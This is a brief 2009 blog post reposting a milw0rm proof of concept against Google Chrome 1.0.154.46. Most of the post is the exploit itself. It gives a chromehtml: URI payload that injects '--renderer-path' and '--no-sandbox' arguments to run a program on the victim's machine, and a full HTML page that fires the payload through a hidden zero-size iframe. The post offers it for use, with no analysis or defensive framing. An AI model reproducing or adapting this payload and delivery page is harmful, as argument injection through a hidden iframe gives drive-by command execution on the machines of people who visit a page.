Friday, January 30, 2009

Yet Another Google Chrome Sploit

Milw0rm released a Google Chrome 1.0.154.46 (ChromeHTML://) Parameter Injection PoC [ by waraxe]

****The following is copied and pasted from http://www.milw0rm.com/exploits/7935****

Try this:

chromehtml:"%20--renderer-path="calc"%20--no-sandbox

Disabling sandbox does matter :)
Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ...

Full PoC:

< html > < head >< title >Chrome URI Handler Remote Command Execution PoC< / title >< / head >
< body >
< h3 >This is a test< / h3 >
< iframe src='chromehtml:"%20--renderer-path="calc"%20--no-sandbox' width=0 height=0 >< / iframe >
< / body>< / html>

# milw0rm.com [2009-01-30]

No comments: